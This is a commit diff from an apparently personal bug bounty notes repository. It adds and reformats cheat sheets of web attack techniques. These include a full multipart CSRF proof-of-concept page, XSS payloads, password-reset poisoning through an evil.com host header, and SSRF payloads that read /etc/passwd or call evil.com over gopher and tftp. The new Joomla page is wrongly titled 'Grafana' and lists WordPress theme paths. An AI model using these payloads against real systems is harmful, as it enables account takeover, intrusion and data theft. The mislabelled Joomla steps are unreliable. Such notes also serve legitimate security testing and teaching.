daffainfo
/
AllAboutBugBounty
mirror of https://github.com/daffainfo/AllAboutBugBounty.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added Joomla and SSRF, and doing some major changes

pull/9/head
Muhammad Daffa 2022-07-09 22:35:32 +07:00
parent abd025fb64
commit 5ac45ada2b
21 changed files with 435 additions and 135 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
Arbitrary File Upload.md
View File

@ -11,7 +11,7 @@ In upload file feature, for example upload photo profile feature
```
POST /images/upload/ HTTP/1.1
Host: target.com
[...]
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
@ -21,7 +21,7 @@ Change the Content-Type
```
POST /images/upload/ HTTP/1.1
Host: target.com
[...]
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
@ -32,7 +32,7 @@ Content-Type: image/jpeg
```
POST /images/upload/ HTTP/1.1
Host: target.com
[...]
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
@ -42,7 +42,7 @@ Change the request to this
```
POST /images/upload/ HTTP/1.1
Host: target.com
[...]
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
@ -53,7 +53,7 @@ Content-Type: application/x-php
```
POST /images/upload/ HTTP/1.1
Host: target.com
[...]
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"

16
Bypass/Bypass 429.md
View File

@ -14,7 +14,7 @@ For example:
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
[...]
...
email=victim@gmail.com
```
@ -23,7 +23,7 @@ email=victim@gmail.com
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
...
email=victim@gmail.com%00
```
@ -33,7 +33,7 @@ email=victim@gmail.com%00
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
[...]
...
email=victim@gmail.com
```
@ -42,7 +42,7 @@ Try this to bypass
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
[...]
...
email=victim@gmail.com
```
@ -51,7 +51,7 @@ email=victim@gmail.com
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
...
email=victim@gmail.com
```
@ -59,7 +59,7 @@ Try this to bypass
```
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
[...]
...
email=victim@gmail.com
```
@ -68,7 +68,7 @@ email=victim@gmail.com
```
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
...
{"email":"victim@gmail.com"}
```
@ -76,7 +76,7 @@ Try this to bypass
```
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]
...
{"email":"victim@gmail.com "}
```

28
Bypass/Bypass CSRF.md
View File

@ -4,7 +4,7 @@
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
@ -12,7 +12,7 @@ Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
```
@ -21,7 +21,7 @@ username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
@ -29,7 +29,7 @@ Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=
```
@ -38,7 +38,7 @@ username=dapos&password=123456&token=
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=aaaaaa
```
@ -46,7 +46,7 @@ Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=aaabaa
```
@ -54,7 +54,7 @@ username=dapos&password=123456&token=aaabaa
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
@ -62,14 +62,14 @@ Try this to bypass
```
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: target.com
[...]
...
```
5. Remove the token from request
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
```
@ -77,7 +77,7 @@ Try this to bypass
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456
```
@ -86,7 +86,7 @@ username=dapos&password=123456
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
```
@ -95,7 +95,7 @@ username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=MTIzNDU2
```
@ -105,7 +105,7 @@ MTIzNDU2 => 123456 with base64
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=vi802jg9f8akd9j123
```
@ -113,7 +113,7 @@ When we register again, the request like this
```
POST /register HTTP/1.1
Host: target.com
[...]
...
username=dapos&password=123456&token=vi802jg9f8akd9j124
```

16
Bypass/Bypass Captcha.md
View File

@ -4,7 +4,7 @@
```
POST / HTTP 1.1
Host: target.com
[...]
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```
@ -13,14 +13,14 @@ Change the method to GET
```
GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
Host: target.com
[...]
...
```
2. Try remove the value of the captcha parameter
```
POST / HTTP 1.1
Host: target.com
[...]
...
_RequestVerificationToken=&_Username=daffa&_Password=test123
```
@ -29,7 +29,7 @@ _RequestVerificationToken=&_Username=daffa&_Password=test123
```
POST / HTTP 1.1
Host: target.com
[...]
...
_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
```
@ -38,7 +38,7 @@ _RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
```
POST / HTTP 1.1
Host: target.com
[...]
...
{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
```
@ -46,7 +46,7 @@ Convert to normal request
```
POST / HTTP 1.1
Host: target.com
[...]
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```
@ -63,7 +63,7 @@ X-Remote-Addr: 127.0.0.1
```
POST / HTTP 1.1
Host: target.com
[...]
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```
@ -71,7 +71,7 @@ Try this to bypass
```
POST / HTTP 1.1
Host: target.com
[...]
...
_RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123
```

85
Misc/Password Reset Flaws.md → Checklist/Forgot Password.md
View File

@ -1,86 +1,109 @@
## Password Reset Flaws
## Forgot Password Functionality
## Introduction
Common security flaws in password reset functionality
Some common bugs in the forgot password / reset password functionality
## How to exploit
1. Parameter pollution in reset password
1. Parameter pollution
```
POST /reset
[...]
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com&email=hacker@mail.com
```
2. Bruteforce the OTP code
```
POST /reset
[...]
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com&code=$123456$
```
3. Host header Injection
```
POST /reset
Host: evil.com
[...]
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com
```
to
```
POST /reset
POST /reset HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
[...]
...
email=victim@mail.com
```
And the victim will receive the reset link with evil.com
4. Using separator in value of the parameter
```
POST /reset
[...]
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com,hacker@mail.com
```
```
POST /reset
[...]
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%20hacker@mail.com
```
```
POST /reset
[...]
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com|hacker@mail.com
```
```
POST /reset
[...]
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%00hacker@mail.com
```
5. No domain in value of the paramter
```
POST /reset
[...]
POST /reset HTTP/1.1
Host: target.com
...
email=victim
```
6. No TLD in value of the parameter
```
POST /reset
[...]
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail
```
7. Using carbon copy
```
POST /reset
[...]
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%0a%0dcc:hacker@mail.com
```
8. If there is JSON data in body requests, add comma
```
POST /newaccount
[...]
POST /newaccount HTTP/1.1
Host: target.com
...
{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}
```
@ -90,6 +113,12 @@ POST /newaccount
- Generated based on the email of the user
- Generated based on the name of the user
10. Try Cross-Site Scripting (XSS) in the form
Sometimes the email is reflected in the forgot password page, try to use XSS payload
```
"<svg/onload=alert(1)>"@gmail.com
```
## References
* [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
* [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414)

53
Cross Site Request Forgery.md
View File

@ -3,7 +3,7 @@
## Introduction
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
## How to find
## Where to find
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
## How to exploit
@ -43,4 +43,53 @@ xhr.send('{"role":admin}');
```
5. Multipart request
Soon
```html
<head>
<title>Multipart CSRF PoC</title>
</head>
<body>
<br>
<hr>
<h2>Click Submit request</h2><br>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://example/api/users", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------149631704917378");
xhr.withCredentials = true;
var body = "-----------------------------149631704917378\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"update\r\n" +
"-----------------------------149631704917378\r\n" +
"Content-Disposition: form-data; name=\"user_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------149631704917378\r\n" +
"Content-Disposition: form-data; name=\"uname\"\r\n" +
"\r\n" +
"daffainfo\r\n" +
"-----------------------------149631704917378\r\n" +
"Content-Disposition: form-data; name=\"first_name\"\r\n" +
"\r\n" +
"m\r\n" +
"-----------------------------149631704917378\r\n" +
"Content-Disposition: form-data; name=\"last_name\"\r\n" +
"\r\n" +
"daffa\r\n" +
"-----------------------------149631704917378--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
<br>
</body>
```

6
Cross Site Scripting.md
View File

@ -236,7 +236,7 @@ ${alert(1)}
<html>
<body>
'onload=alert(1)><svg/1='
[...]
...
'onload=alert(1)><svg/1='
</body>
</html>
@ -255,9 +255,9 @@ ${alert(1)}
<html>
<body>
*/alert(1)">'onload="/*<svg/1='
[...]
...
*/alert(1)">'onload="/*<svg/1='
[...]
...
*/alert(1)">'onload="/*<svg/1='
</body>
</html>

17
Denial Of Service.md
View File

@ -16,9 +16,9 @@ After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there
2. Try input a very long payload to form. For example using very long password or using very long email
```
POST /Register HTTP/1.1
POST /register HTTP/1.1
Host: target.com
[...]
...
username=victim&password=aaaaaaaaaaaaaaa
```
@ -56,12 +56,15 @@ Accept-Encoding: gzip, gzip, deflate, br, br
```
GET /index.html HTTP/1.1
Host: victim.com
X-Oversized-Header-1: Big_Value
X-Oversized-Header-1: Big_Value
...
```
The response is
```
HTTP/1.1 400 Bad Request
...
Header size exceeded
```
- HTTP Meta Character (HMC)
@ -72,11 +75,13 @@ Accept-Encoding: gzip, gzip, deflate, br, br
GET /index.html HTTP /1.1
Host: victim.com
X-Meta-Malicious-Header: \r\n
...
```
The response is
```
HTTP/1.1 400 Bad Request
...
Character not allowed
```
- HTTP Method Override (HMO)
@ -92,12 +97,14 @@ Accept-Encoding: gzip, gzip, deflate, br, br
GET /index.php HTTP/1.1
Host: victim.com
X-HTTP-Method-Override: POST
...
```
The response is
```
HTTP/1.1 404 Not Found
...
POST on /index.php not foudn
POST on /index.php not found
```
- X-Forwarded-Port
@ -105,6 +112,7 @@ Accept-Encoding: gzip, gzip, deflate, br, br
GET /index.php?dontpoisoneveryone=1 HTTP/1.1
Host: www.hackerone.com
X-Forwarded-Port: 123
...
```
- X-Forwarded-Host
@ -112,6 +120,7 @@ Accept-Encoding: gzip, gzip, deflate, br, br
GET /index.php?dontpoisoneveryone=1 HTTP/1.1
Host: www.hackerone.com
X-Forwarded-Host: www.hackerone.com:123
...
```
![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png)

12
Host Header Injection.md
View File

@ -29,12 +29,12 @@ Host: evil-website.com
```
4. Add host override headers
```
X-Forwarded-For : evil-website.com
X-Forwarded-Host : evil-website.com
X-Client-IP : evil-website.com
X-Remote-IP : evil-website.com
X-Remote-Addr : evil-website.com
X-Host : evil-website.com
X-Forwarded-For: evil-website.com
X-Forwarded-Host: evil-website.com
X-Client-IP: evil-website.com
X-Remote-IP: evil-website.com
X-Remote-Addr: evil-website.com
X-Host: evil-website.com
```
How to use? In this case im using "X-Forwarded-For : evil.com"
```

140
Insecure Direct Object References.md
View File

@ -10,150 +10,206 @@ IDOR stands for Insecure Direct Object Reference is a security vulnerability in
## How to exploit
1. Add parameters onto the endpoints for example, if there was
```
GET /api/v1/getuser
[...]
GET /api/v1/getuser HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
GET /api/v1/getuser?id=1234
[...]
GET /api/v1/getuser?id=1234 HTTP/1.1
Host: example.com
...
```
2. HTTP Parameter pollution
```
POST /api/get_profile
[...]
POST /api/get_profile HTTP/1.1
Host: example.com
...
user_id=hacker_id&user_id=victim_id
```
3. Add .json to the endpoint
```
GET /v2/GetData/1234
[...]
GET /v2/GetData/1234 HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
GET /v2/GetData/1234.json
[...]
GET /v2/GetData/1234.json HTTP/1.1
Host: example.com
...
```
4. Test on outdated API Versions
```
POST /v2/GetData
[...]
POST /v2/GetData HTTP/1.1
Host: example.com
...
id=123
```
Try this to bypass
```
POST /v1/GetData
[...]
POST /v1/GetData HTTP/1.1
Host: example.com
...
id=123
```
5. Wrap the ID with an array.
```
POST /api/get_profile
[...]
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":111}
```
Try this to bypass
```
POST /api/get_profile
[...]
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"id":[111]}
```
6. Wrap the ID with a JSON object
```
POST /api/get_profile
[...]
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":111}
```
Try this to bypass
```
POST /api/get_profile
[...]
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":{"user_id":111}}
```
7. JSON Parameter Pollution
```
POST /api/get_profile
[...]
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":"hacker_id","user_id":"victim_id"}
```
8. Try decode the ID, if the ID encoded using md5,base64,etc
```
GET /GetUser/dmljdGltQG1haWwuY29t
[...]
GET /GetUser/dmljdGltQG1haWwuY29t HTTP/1.1
Host: example.com
...
```
dmljdGltQG1haWwuY29t => victim@mail.com
9. If the website using graphql, try to find IDOR using graphql!
9. If the website using GraphQL, try to find IDOR using GraphQL
```
GET /graphql
[...]
GET /graphql HTTP/1.1
Host: example.com
...
```
```
GET /graphql.php?query=
[...]
GET /graphql.php?query= HTTP/1.1
Host: example.com
...
```
10. MFLAC (Missing Function Level Access Control)
```
GET /admin/profile
GET /admin/profile HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
GET /ADMIN/profile
GET /ADMIN/profile HTTP/1.1
Host: example.com
...
```
11. Try to swap uuid with number
```
GET /file?id=90ri2-xozifke-29ikedaw0d
GET /file?id=90ri2-xozifke-29ikedaw0d HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
GET /file?id=302
Host: example.com
...
```
12. Change HTTP Method
```
GET /api/v1/users/profile/111
GET /api/v1/users/profile/111 HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
POST /api/v1/users/profile/111
POST /api/v1/users/profile/111 HTTP/1.1
Host: example.com
...
```
13. Path traversal
```
GET /api/v1/users/profile/victim_id
GET /api/v1/users/profile/victim_id HTTP/1.1
Host: example.com
...
```
Try this to bypass
```
GET /api/v1/users/profile/my_id/../victim_id
GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1
Host: example.com
...
```
14. Change request content type
14. Change request `Content-Type`
```
GET /api/v1/users/1 HTTP/1.1
Host: example.com
Content-type: application/xml
```
Try this to bypass
```
GET /api/v1/users/2 HTTP/1.1
Host: example.com
Content-type: application/json
```
15. Send wildcard instead of ID
```
GET /api/users/111
GET /api/users/111 HTTP/1.1
Host: example.com
```
Try this to bypass
```
GET /api/users/*
GET /api/users/* HTTP/1.1
Host: example.com
```
```
GET /api/users/% HTTP/1.1
Host: example.com
```
```
GET /api/users/_ HTTP/1.1
Host: example.com
```
```
GET /api/users/. HTTP/1.1
Host: example.com
```
16. Try google dorking to find new endpoint
## References

15
Misc/Mass Assignment.md → Mass Assignment.md
View File

@ -6,22 +6,25 @@ Occurs when an app allows a user to manually add parameters in an HTTP Request &
## How to exploit
- Normal request
```
POST /editdata
Host: vuln.com
POST /editdata HTTP/1.1
Host: target.com
...
username=daffa
```
The response
```
HTTP/1.1 200 OK
...
username=daffa&admin=false
{"status":"success","username":"daffainfo","isAdmin":"false"}
```
- Modified Request
```
POST /editdata
Host: vuln.com
POST /editdata HTTP/1.1
Host: target.com
...
username=daffa&admin=true
```
@ -30,7 +33,7 @@ username=daffa&admin=true
HTTP/1.1 200 OK
...
username=daffa&admin=true
{"status":"success","username":"daffainfo","isAdmin":"true"}
```
## References

12
Misc/Account Takeover.md
View File

@ -12,14 +12,14 @@ Account Takeover (known as ATO) is a type of identity theft where a bad actor ga
2. Try re-sign up using same email
```
POST /newaccount
[...]
POST /newaccount HTTP/1.1
...
email=victim@mail.com&password=1234
```
After sign up using victim email, try signup again but using different password
```
POST /newaccount
[...]
POST /newaccount HTTP/1.1
...
email=victim@mail.com&password=hacked
```
@ -41,9 +41,9 @@ Account Takeover (known as ATO) is a type of identity theft where a bad actor ga
4. Chaining with IDOR, for example
```
POST /changepassword.php
POST /changepassword.php HTTP/1.1
Host: site.com
[...]
...
userid=500&password=heked123
```
500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID

1
Misc/Broken Link Hijacking.md
View File

@ -9,6 +9,7 @@ Broken Link Hijacking exists whenever a target links to an expired domain or pag
## Tools
- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
- [Check My Links](https://chrome.google.com/webstore/detail/check-my-links/ojkcdipcgfaekbeaelaapakgnjflfglf/related)
## References
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)

0
Misc/Default Credentials Normal file
View File

10
README.md
View File

@ -6,7 +6,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
![](https://img.shields.io/github/stars/daffainfo/AllAboutBugBounty)
![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty)
## List
## List Vulnerability
- [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md)
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
- [CRLF Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CRLF%20Injection.md)
@ -17,6 +17,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
- [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md)
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Mass%20Assignment.md)
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
@ -24,6 +25,10 @@ These are my bug bounty notes that I have gathered from various sources, you can
- SQL Injection (SOON)
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
## Checklist
- [Forgot Password Functionality](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Checklist/Forgot%20Password.md)
- Register Functionality SOON!
## List Bypass
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
@ -38,8 +43,6 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Default Credentials](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Default%20Credentials.md)
- [Email Spoofing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Email%20Spoofing.md)
- [JWT Vulnerabilities](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/JWT%20Vulnerabilities.md)
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
## Technologies
@ -48,6 +51,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
- [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md)
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)

0
Recon/Github Dorks.md → Reconnaissance/Github Dorks.md
View File

0
Recon/Google Dorks.md → Reconnaissance/Google Dorks.md
View File

0
Recon/Scope.md → Reconnaissance/Scope.md
View File

0
Recon/Shodan Dorks.md → Reconnaissance/Shodan Dorks.md
View File

106
Server Side Request Forgery.md Normal file
View File

@ -0,0 +1,106 @@
# Server Side Request Forgery (SSRF)
## Introduction
Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests originating from the vulnerable server
## Where to find
Usually it can be found in the request that contain request to another url, for example like this
```
POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com
urlApi=http://192.168.1.1%2fapi%2f&id=1
```
or
```
GET /image?url=http://192.168.1.1/
Host: example.com
```
## How to exploit
1. Basic payload
```
http://127.0.0.1:1337
http://localhost:1337
```
2. Hex encoding
```
http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
```
3. Octal encoding
```
http://127.0.0.1 -> http://0177.0.0.01
```
4. Dword encoding
```
http://127.0.0.1 -> http://2130706433
```
5. Mixed encoding
```
http://127.0.0.1 -> http://0177.0.0.0x1
```
6. Using URL encoding
```
http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74
```
7. Using IPv6
```
http://0000::1:1337/
http://[::]:1337/
```
8. Using bubble text
```
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
Use this https://capitalizemytitle.com/bubble-text-generator/
```
## How to exploit (URI Scheme)
1. File scheme
```
file:///etc/passwd
```
2. Dict scheme
```
dict://127.0.0.1:1337/
```
3. FTP scheme
```
ftp://127.0.0.1/
```
4. TFTP scheme
```
tftp://evil.com:1337/test
```
5. SFTP scheme
```
sftp://evil.com:1337/test
``
6. LDAP scheme
```
ldap://127.0.0.1:1337/
```
7. Gopher scheme
```
gopher://evil.com/_Test%0ASSRF
```
## References
* [Vickie Li](https://vickieli.medium.com/bypassing-ssrf-protection-e111ae70727b)

43
Technologies/Joomla.md Normal file
View File

@ -0,0 +1,43 @@
# Grafana
## Introduction
What would you do if you came across a website that uses Joomla ?
## How to Detect
Try to HTTP request to `https://example.com/` and if you see the source code, you will see something like this `<meta name="generator" content="Joomla! - Open Source Content Management" />`
1. Find the related CVE by checking the core, plugins, and theme version
* How to find the joomla version
```
https://target.com/administrator/manifests/files/joomla.xml
```
* How to find the joomla plugin version
```
https://target.com/administrator/components/com_NAMEPLUGIN/NAMEPLUGIN.xml
for example
https://target.com/administrator/components/com_contact/contact.xml
```
> or change NAMEPLUGIN.xml to `changelog.txt` or `readme.md` or `readme.txt`
* How to find the theme version
```
https://target.com/wp-content/themes/THEMENAME/style.css
https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)
```
If you found outdated core / plugins, find the exploit at https://exploit-db.com
2. Joomla! Config Dist File
```
https://example.com/configuration.php-dist
```
3. Database File List
```
https://example.com/libraries/joomla/database/
```
## References
- [Exploit-db #6377](https://www.exploit-db.com/ghdb/6377)